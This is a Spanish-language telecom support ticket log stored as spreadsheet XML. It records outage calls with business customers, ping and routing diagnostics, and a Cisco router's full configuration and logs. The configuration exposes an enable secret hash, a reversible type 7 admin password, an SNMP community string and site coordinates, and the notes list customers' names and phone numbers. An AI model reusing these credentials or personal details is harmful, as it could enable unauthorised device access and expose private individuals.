NÚMERO: 0050585107210
DURACIÓN: 0:02:24
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050585107210
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 5/06/2022 08:56:29</t>
  </si>
  <si>
    <t>F4589283</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE SANDRA E INDICA QUE TODAVÍA PRESENTA PROBLEMAS CON EL SERVICIO, SE CORRIO UNA CONSULTA DE ERRORES PERO SIGUIEN PRESENTES.
QMCIL:AFLR=81-12,ED=SI;
   CMD QMCIL  00002   22-06-06 13-26-32
   INP QMCIL  00002   22-06-06 13-26-32
   RES QMCIL  00002   22-06-06 13-26-32
    CEN=1/22-06-06/13 H 26 MN 32/CRC4:LISTAD.DE LA CALIDAD DE LOS MIC
    PROCESO    TODCRC ACC
  AM = SMBD01 MIC = 007-01-05     CRC = NACT
  AFLR = 081-012
  SENS = E NSAE=00000104 NSGE=00000104 NIND=00000000 INDI=00000000
  SENS = R NSAE=00000002 NSGE=00000002 NIND=00000000 INDI=00000000 NSDT=00000000
    PROCESO    TODCRC EXC
COMANDO EJECUTADO
   RPT QMCIL  00002   22-06-06 13-26-32
       EXC</t>
  </si>
  <si>
    <t>F4589296</t>
  </si>
  <si>
    <t>SE CONVERSA CON  CLIENTE HENRY SEGOVIA, MENICIONA QUE EL DIA DE HOY NO SE TRABAJA Y QUE SE LE LLAME EL DIA DE MAÑANA EN HORARIO HABIL PARA VALIDAR POR SU LADO, SE LE INDICA QUE NO SE OBSERVAN EQUIPOS CONECTADOS AL ROUTER DE CLARO E INDICA QUE ES DEBIDO A QUE NADIE ESTA UTILIZANDO EL SERVICIO. SE CONTACTARA MAÑANA EN HORARIO HABIL A PARTIR DE LAS 8:00 HORAS.
1001397334
COLA:
NOMBRE: A: 0050360670084
NÚMERO: 0050360670084
DURACIÓN: 0:01:48
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050360670084
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 5/06/2022 10:40:01</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY SEGOVIA 60670084 MENCIONA QUE TOODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 1001474387 - 1001474815</t>
  </si>
  <si>
    <t>F4589339</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DEL CLIENTE PARA LOS ACCESOS
ASUNTO: RE: FALLA DE ENLACE DE INGENIO GRECIA</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS PARA VISITA MAÑANA 8:30 AM || PENDIENTE CONFIRMACIÓN
ERITO FERNANDO TECU XITUMUL
ASUNTO: RE: FALLA DE ENLACE DE INGENIO GRECIA
BUENA TARDE ESTIMADOS BANCO ATLÁNTIDA.
EN SEGUIMIENTO AL SERVICIO REPORTADO 1030344OH || OH1000607933/BANCO ATLANTIDA S A  - || UBICACIÓN: INGENIO LA GRECIA MARCOVIA, CHOLUTECA, KM 21 CARRETERA A CEDEÑO. LE COMENTO QUE SE ESTÁ COORDINANDO UNA VISITA TÉCNICA PARA EL DÍA DE MAÑANA MARTES 07/06 A PARTIR DE LAS 8:30 AM, SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR LOS ACCESOS PARA NUESTRO PERSONAL TÉCNICO.
ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO ASIGNADO A VISITA.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL JOSE MANUEL PINEDA 22800000 EXT. 6385 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001489487
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE MANUEL PINEDA 22800000 EXT. 6385 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001574109</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL JOSE MANUEL PINEDA 22800000 EXT. 6385 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001470421
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL JOSE MANUEL PINEDA 22800000 EXT. 6385 NO RESPONDE SE INTENTARA LUEGO **
ID 1001466009
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL JOSE MANUEL PINEDA 22800000 EXT. 6385 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001697975 - 1001698849
**</t>
  </si>
  <si>
    <t>F4589368</t>
  </si>
  <si>
    <t xml:space="preserve">SE REALIZAN REPARACIONES DE FIBRA OPTICA EN  1000 METROS DE LA CENTRAL Y UN KILOMETRO 20 METROS DEL CLIENTE  SE PORCEDE CON EL CIERRE DEL SERVICIO .
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INNOVA_DATOS 10.174.186.130
  PING 10.174.186.130: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.186.130 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.24
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INNOVA_DATOS 10.174.186.130
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INNOVA_DATOS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 10.174.186.130/32  DIRECT  0    0                 0.0.0.0         VLANIF2358			</t>
  </si>
  <si>
    <t>SE LLAMA A IVAN TECNICO EN SITIO SE ENCUENTRAN UBICANDO EL CORTE PARA PODER REESTABLECER EL SERVICIO AVANCES EN UNA HORA.</t>
  </si>
  <si>
    <t>-* SE HABLA CON MELVIN CHACON (CLIENTE) INFORMA QUE LOS PERMISOS YA ESTAN GESTIONADOS, SOLICITA SE PROCEDA -*
-*</t>
  </si>
  <si>
    <t>SE HABLA CON IVAN YA SE SOLICITO GRUPO PARA REPARACIONES DE FIBRA OPTICA POR LA LLUVIA ES POSIBLE QUE ALLA TRANSITO VAN EN CAMINO AV3ENCES EN 1 HORA.</t>
  </si>
  <si>
    <t>F4589381</t>
  </si>
  <si>
    <t>SE LLAMA AL PR FRANCISCO CASTILLO  ID 1001238880 DONDE COMENTA QUE NO LO PUEDE VALIDAR Y QUE  LLEGARA A LA FINCA HASTA EL DÍA LUNES POR TAL RAZÓN SI EL SERVICIO DE NUESTRO LADO ESTA OPERATIVO CONFIRMA EL CIERRE DE LA FALLA Y TICKET Y EN CASO DE PRESENTAR ALGUNA AFECTACION LLAMARA NUEVAMENTE. SE NOTIFICA AL GESTOR LUIS.IXCOT PARA EL CIERRE.</t>
  </si>
  <si>
    <t>F4589384</t>
  </si>
  <si>
    <t>SE HABLÓ CON ALLAN DURAN/CLIENTE 00 525551745299 INDICA QUE VERIFICARÁ, ME DEJA DEMASIADO TIEMPO EN ESPERA, SE DEBE LLAMAR MÁS TARDE; ADICIONAL SE PIDE APOYO VÍA CORREO.</t>
  </si>
  <si>
    <t>F4589434</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS AROLDO MORALES 47697104 NO CONTESTA ENVIA A BUZON ||
SE INTENTARA LUEGO**
-ID 1001496510
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS AROLDO MORALES 47697104 SOLICITA QUE SE LE LLAME EN 5 MIN PARA HACER PRUEBAS**
-ID 1001490348
**</t>
  </si>
  <si>
    <t>SE LLAMA A MARIA 50174608 QUIEN INDICA QUE ELLA ES LA DE PREVENTA PERO NO TIENE CONOCIMIENTO DE ALGUN BLOQUEO, INDICA QUE RESPONDERA VIA CORREO-.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A COMERCIAL  &gt;&gt;&gt; YA QUE EXISTIO UNA OT DONDE FUE QUITADO LA RUTA, ES NECESARIO VALIDAR CON COMERCIAL SI SE TIENE TEMAS PENDIENTES ---
YENSI SUCELY CALGUA MATEO
BUEN DÍA ESTIMADA,
GUSTO EN SALUDARLE, EL MOTIVO DE LA PRESENTE ES PARA SOLICITAR SU APOYO CON RESPECTO AL CLIENTE CORPORACION ALUARCA, S.A.  IDENTIFICADO CON ID  818900001T ACTUALMENTE SE TIENE REPORTE DE CLIENTE. SE TIENE CONOCIMIENTO QUE SE TUVO UNA OT T796773 DONDE SE BLOQUEÓ EL SERVICIO POSIBLEMENTE POR TEMAS ADMINISTRATIVOS.
AGRADECERÍAMOS SU APOYO INDICANDO SI AÚN SE TIENE ALGÚN TEMA PENDIENTE ADMINISTRATIVO O EN DADO CASO NO, PARA COLOCAR NUEVAMENTE LA RUTA.
EN ESPERA DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS AROLDO MORALES 47697104 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001475992</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS AROLDO MORALES AL 47697104 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001526671
**</t>
  </si>
  <si>
    <t>F4589439</t>
  </si>
  <si>
    <t>CLIENTE LUIS  78843777 ,COMENTA QUE NO SE ENCUENTRA EN INSTALACIONES, YA QUE SE NECESITAN REALIZAR DESCARTES DE PRIMER NIVEL, COMENTA QUE S E LE PUEDA LLAMAR EN 15 MINUTOS EL SE DIRIGE A SITIO</t>
  </si>
  <si>
    <t>F4589447</t>
  </si>
  <si>
    <t>SE CONSULTA CON CLIENTE TEMA DE ENERGIA EN PUNTO REMOTO.
18:25
BUENA TARDE CON EL SITIO CC_AZTECA_GT_GCC341127/265900273T TENDRÁN INFORMACIÓN?
JORGE, 18:25
BUENAS TARDES, TAMBIÉN SE TIENE PROBLEMA DE ENERGÍA</t>
  </si>
  <si>
    <t>F4589496</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE DARWIN, INDICA QUE ESTARA RESPONDIENDO AL CORREO EL DIA DE HOY POR LO QUE SE QUEDA A ESPERA VIA CORREO.
1001399639
COLA:
NOMBRE: A: 0050495093319
NÚMERO: 0050495093319
DURACIÓN: 0:01:24
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050495093319
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 5/06/2022 10:56:05</t>
  </si>
  <si>
    <t>SE LE ESCRIBE A CLIENTE VIA WHATSAPP, INFORMA QUE SI LE FUNCIONO EL CAMBIO DE DNS, ESTARA ESCRIBIENDO VIA CORREO LA AUTORIZACION DE CIERRE, ACTUALMENTE ESTA EN SU ALMUERZO...
HTTPS://WWW.SOFTWARETESTINGHELP.COM/DNS-PROBE-FINISHED-NXDOMAIN-FIXED/#:~:TEXT=WHENEVER%20A%20USER%20RECEIVES%20DNS,THE%20USER%20WANTED%20TO%20ACCESS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. DARWIN MAIRENA 95093319 ...</t>
  </si>
  <si>
    <t>SE LE SOLICITA REALIZAR PRUEBAS (CAMBIAR DNS) A CLIENTE SR. DARWIN MAIRENA 95093319 INFORMA QUE EN ESTE MOMENTO NO ESTA LA PERSONA QUE PUEDE REALIZAR LAS PRUEBAS EN SITIO REMOTO, POR TAL MOTIVO SOLICITA LLAMAR DESPUES DE LA 1PM ...</t>
  </si>
  <si>
    <t>F4589517</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 3 DE JUNIO DE 2022 20:14
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; TINTI PERDOMO, ERICK IVAN &lt;ETINTI@BI.COM.GT&gt;; MEJICANOS CORONADO, LUIS ALBERTO &lt;LMEJICANOS@BI.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; JOSE DAVID RAMIREZ STAMBUK &lt;JOSEDAV.RAMIREZ@CLARO.COM.GT&gt;; EDDY FRANCISCO MONTUFAR ELIAS &lt;EDDY.MONTUFAR@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SOC TECNOLOGÍA &lt;SOCBI@BI.COM.GT&gt;; MARIO RODOLFO RODAS GONZALEZ &lt;MARIO.RODAS@CLARO.COM.GT&gt;
CC: SEGURIDAD TI &lt;SEGURIDADTI@BI.COM.GT&gt;; CIBERSEGURIDAD &lt;CIBERSEGURIDAD@BI.COM.GT&gt;; SEGURIDADINFORMACION &lt;SEGURIDADINFORMACION@BI.COM.GT&gt;
ASUNTO: RE: RREPORTE DE PHISHING
BUENAS NOCHES ESTIMADOS(A)
COMO PARTE DEL SEGUIMIENTO AL CASO SE PROCEDIÓ CON EL BLOQUEO SOLICITADO. POR FAVOR SU AMABLE APOYO VALIDANDO. GRACIAS. SALUDOS</t>
  </si>
  <si>
    <t>F4589600</t>
  </si>
  <si>
    <t>SE PROCEDE A DEJAR EN ETAPA PENDIENTE CLEINTE PARA VALIDAR SOLICITAR CONTACTO AL CLIENTE.</t>
  </si>
  <si>
    <t xml:space="preserve">SE VALIDA EN EL CHASSIS EN EL SLOT CORRECTO SEGUN DISEÑIO 4 PUERTO DOS ESTA CAIDO ES NECESARIO REALIZAR PRUEBAS PARA DESCARTAR PROBLEMAS DE ENERGIA COMERCIAL O ESTADO DE EQUIPOS Y SI FUERA NECESARIO ENVIAR PERSONAL DE CAMPO.
CHASSIS	SLOT	SIDE	TYPE	VERSION
00	04	LOCAL	1000EAS-X	1.300-1.044-0.000-0.000
FIBER 1FIBER 2UTP 3UTP 4DEVICESYSTEM1Q VLANSTORMCONTROLLOOPPROTECTCOUNTERSSFP
FIBER2 STATUS AND CONFIGURATION
LINK	REMOTE B POWER	OAM RLB STATUS	OAM LOOPED	SFP	D/D
DOWN	ABNORMAL	OFF	OFF	YES	YES
PORT ACTIVE	
ENABLE
FIBER SPEED	
1G
802.3 OAM CHANNEL B MODE	
ACTIVE
AUTO LASER SHUTDOWN(ALS)	
DISABLE
REMOTE LOOPBACK TEST	
DISABLE
INGRESS RATE LIMIT (64K ~ 990M)	
UNLIMITED
EGRESS RATE LIMIT	
UNLIMITED
LINK LOSS FORWARDING EVENT(FIBER POWER OFF)
LOGIC	FIBER 1 RX LOSS	UTP 3 LINK LOSS	UTP 4 LINK LOSS
AND
		</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO SE REVISARA ULTIMA MILLA DEL SERVICIO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN WALLMART 10.18.48.140
  PING 10.18.48.140: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.18.48.140 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.11
DISPLAY IP ROUTING-TABLE VPN-INSTANCE WALLMART 10.18.48.140
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALLMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.18.48.128/28  DIRECT  0    0             D   10.18.48.130    VLANIF1795			</t>
  </si>
  <si>
    <t>F4589601</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON SERGIO GARCÍA/CLIENTE 00 525551745299 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4589617</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO SE PROCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE POR ENERGIA COMERCIAL..
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN TRANSFERENCIAS 10.87.30.21
  PING 10.87.30.21: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.30.21 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.13
DISPLAY IP ROUTING-TABLE VPN-INSTANCE TRANSFERENCIAS 10.87.30.21
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
     10.87.30.0/25  DIRECT  0    0             D   10.87.30.1      VLANIF10			</t>
  </si>
  <si>
    <t>F4589618</t>
  </si>
  <si>
    <t xml:space="preserve">
SE VALIDA QUE SE TUVA UNA CAIDA NE LA INTERFACE PRINCIPAL LO CUAL INDICA QUE TUVO UNA RECONVERGENCIA OUN CAMBIO DE RUTA DINAMICO  LO CUAL PROVOCO UNA INTERMITENCIA QUE YA SE ENCUENTRA REESTABLECIDA SE PROCEDE A VALIDAR CON EL CLIENTE.
JUN  4 01:47:25.791 UTC: %SSH-4-SSH2_UNEXPECTED_MSG: UNEXPECTED MESSAGE TYPE HAS ARRIVED. TERMINATING THE CONNECTION FROM 85.38.107.132
*JUN  4 02:36:13.513 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*JUN  4 02:36:13.515 UTC: %LINK-3-UPDOWN: INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN  4 02:36:14.513 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*JUN  4 02:36:14.514 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN  4 02:36:20.447 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*JUN  4 02:36:20.454 UTC: %LINK-3-UPDOWN: INTERFACE VLAN1, CHANGED STATE TO UP
*JUN  4 02:36:21.449 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*JUN  4 02:36:21.456 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*JUN  4 02:36:41.518 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*JUN  4 02:36:41.521 UTC: %LINK-3-UPDOWN: INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN  4 02:36:42.518 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*JUN  4 02:36:42.518 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN  4 02:36:45.441 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*JUN  4 02:36:45.447 UTC: %LINK-3-UPDOWN: INTERFACE VLAN1, CHANGED STATE TO UP
*JUN  4 02:36:46.444 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*JUN  4 02:36:46.449 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*JUN  4 03:37:47.274 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 10.105.59.1] [LOCALPORT: 23] AT 03:37:47 UTC SAT JUN 4 2022
CC_TECNO_MUNDO_GT_INTERNET_SANMARCOS#
SHOW CLOCK
*03:38:03.818 UTC SAT JUN 4 2022
CC_TECNO_MUNDO_GT_INTERNET_SANMARCOS#
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 3 SEMANAS.
CISCO IOS XE SOFTWARE, VERSION 16.09.05
CISCO IOS SOFTWARE [FUJI], ISR SOFTWARE (ARMV8EB_LINUX_IOSD-UNIVERSALK9_IAS-M), VERSION 16.9.5, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2020 BY CISCO SYSTEMS, INC.
COMPILED THU 30-JAN-20 18:09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TECNO_MUNDO_GT_INTERNET_SANMARCOS UPTIME IS 3 WEEKS, 4 DAYS, 10 HOURS, 58 MINUTES
UPTIME FOR THIS CONTROL PROCESSOR IS 3 WEEKS, 4 DAYS, 11 HOURS, 0 MINUTES
SYSTEM RETURNED TO ROM BY POWERON
SYSTEM IMAGE FILE IS "BOOTFLASH:C1100-UNIVERSALK9_IAS.16.09.05.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UNTHROTTLED
SMART LICENSING STATUS: SMART LICENSING IS DISABLED
CISCO C1111-4P (1RU) PROCESSOR WITH 1452736K/6147K BYTES OF MEMORY.
PROCESSOR BOARD ID FGL2544M436
1 VIRTUAL ETHERNET INTERFACE
6 GIGABIT ETHERNET INTERFACES
4294966432 TERMINAL LINES
32768K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
4194304K BYTES OF PHYSICAL MEMORY.
2945023K BYTES OF FLASH MEMORY AT BOOTFLASH:.
0K BYTES OF WEBUI ODM FILES AT WEBUI:.
CONFIGURATION REGISTER IS 0X2102
CC_TECNO_MUNDO_GT_INTERNET_SANMARCOS#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 5293 BYTES
!
! LAST CONFIGURATION CHANGE AT 16:40:08 UTC MON MAY 9 2022
!
VERSION 16.9
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME CC_TECNO_MUNDO_GT_INTERNET_SANMARCOS
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$VLGS$BW5T0OQAREJPKHQJGU8D./
!
NO AAA NEW-MODEL
!
!
!
!
LOGIN ON-SUCCESS LOG
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-3455870363
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-3455870363
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-3455870363
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-3455870363
 CERTIFICATE SELF-SIGNED 01
  30820330 30820218 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 33343535 38373033 3633301E 170D3232 30323235 31363430
  33335A17 0D333030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D33 34353538
  37303336 33308201 22300D06 092A8648 86F70D01 01010500 0382010F 00308201
  0A028201 0100AD34 5BC2194E 2D3F872E B48DADD3 C6A8EFBB DDCF3DEF E0A023FA
  C0D78D12 77EDDD70 6BCAC09D 837E77D2 8C2F2ACD 827F388C 6562744D C1B4A223
  287C9A15 9EC7B8A5 9C636485 74C80393 73EA6DF0 2F124075 01EE43FC B5240E23
  F7683FA3 EB496CFC 699A4562 21D99E0F FEEB243F 4052BFAD 19CB91FB B1B13D3D
  4CBDAC1A FA0800CF 71D1607E 3E581799 E171EA7F EA6D5740 0763FDAB 73D7061E
  278742F4 EC919084 90128D5F 4D720254 24FEFFC1 BD2F95AA A69E0F23 45003D60
  787D1C4C 06DBD4ED 1D435020 FD4567CD 11C8D242 FE5CD0BC 1BE376FB 7FF31F79
  68F22831 CBAAC5CB 9C6161ED AE5279BB 2D1BA907 5C7974C7 614C238C 06F1BAAD
  D38A32AB C28D0203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF
  301F0603 551D2304 18301680 14D94F14 F54B59BB D5FCA553 6F570E4B E15E561B
  6F301D06 03551D0E 04160414 D94F14F5 4B59BBD5 FCA5536F 570E4BE1 5E561B6F
  300D0609 2A864886 F70D0101 05050003 82010100 17C24E71 5F9D7154 17244BC9
  96B60510 5BFFDA63 F9E630FC FF0E6E15 3F603EE5 F4716D28 C95A4B84 4C2A652C
  20F50B0E 64CCAE8D 37EA33C9 45C78CAF 074E9CA2 D3ED718B 24B8A612 174353CD
  170EED5B 4A2BE6BC 23AB08A8 D5337E4E 94ADA165 8CAC2D10 6D158662 4B0042D3
  8BFCD4EB D3C12ED3 70505CE4 15F7D3E0 589C7CDD EA728B8C 50D9A7D5 B6480CE5
  409A9ED2 E7606268 0B8D4E02 7B3BC78B 4F349A64 6A3E5090 298449D6 E0680C3B
  E0EDC7F0 5EDFE1AA 1F0712FE 7929FB0D 048DAB17 FE31AACA 2DA63787 A70FDC68
  51488E56 AD30DE10 56851588 05F3668B 074BB2F3 A0B5981F 9BC35BA0 699110F2
  A4650948 665BF33D A0C999FE 98B4FB7F 536E3008
  	QUIT
!
LICENSE UDI PID C1111-4P SN FGL2544M436
NO LICENSE SMART ENABLE
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
USERNAME GESTIONIP PRIVILEGE 15 PASSWORD 7 10402C4E1247000048
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
!
CLASS-MAP MATCH-ALL SERVICIOS_300MB
 MATCH ANY
!
POLICY-MAP SERVICIOS_300MB
 CLASS SERVICIOS_300MB
  POLICE CIR 307200000 BC 57600000 BE 115200000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
   VIOLATE-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.199.69 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN PRINCIPAL/_/927300001T/_/
 BANDWIDTH 307200
 IP ADDRESS 10.105.59.6 255.255.255.224
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 NO IP ADDRESS
 SHUTDOWN
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
!
INTERFACE GIGABITETHERNET0/1/1
!
INTERFACE GIGABITETHERNET0/1/2
!
INTERFACE GIGABITETHERNET0/1/3
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 307200
 IP ADDRESS 190.149.63.125 255.255.255.252
 SERVICE-POLICY INPUT SERVICIOS_300MB
 SERVICE-POLICY OUTPUT SERVICIOS_300MB
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.105.59.1
!
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_SAN MARCOS TAJUMULCO, 15.083641 -91.917522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TECNO_MUNDO_GT_INTERNET_SANMARCOS#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 4518 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 4518 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
